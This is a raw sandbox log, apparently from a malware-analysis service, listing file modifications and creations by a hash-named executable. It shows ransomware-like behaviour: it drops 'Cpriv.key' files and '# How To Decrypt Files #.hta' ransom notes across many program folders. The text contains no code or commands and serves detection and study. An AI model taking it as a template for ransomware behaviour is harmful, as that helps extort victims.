C:\Program Files\Microsoft Office\Document Themes 14\Origin.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ADD.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1040\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceSimplifiedQuanPin.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\JOURNAL\JOURNAL.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02466U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR7F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\skin.catalog de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SKY\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185780.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-highlight.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME21.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\BriefcaseIconMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\PSS10R.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Pretty_Peacock.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15170_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_left_mousedown.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196364.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02389_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid_over.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_glass.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZTOOL.ACCDE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00248_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00407_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0186002.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\sqloledb.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\15x15dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Library\SOLVER\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ROAD_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office32.en-us\Office32MUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Earthy.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00444_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ED00019_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FINCL_02.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\WindowsPowerShell\Configuration\Schema\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00564_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\SketchPadTestSchema.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKACCS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00116_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15135_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\NOTEL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SIGNL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\Filters.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02125_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ReviewRouting_Review.xsn de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292286.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01145_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR6B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BRCHUR98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TextConv\WPFT632.CNV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212953.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00394_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Outlook.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN044.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\REFINED\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21330_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AU.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiItalic.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD.DEV_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME44.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ro.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME39.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Acrobat\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\MEIPreload\preloaded_data.pb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\AppInfoDocument\Microsoft.VisualStudio.Tools.Office.AppInfoDocument\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STUDIO\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-docked.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\STUBBY2.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\INDOMAIN.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\SmallLogo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\JFONT.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\PACBELL.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program 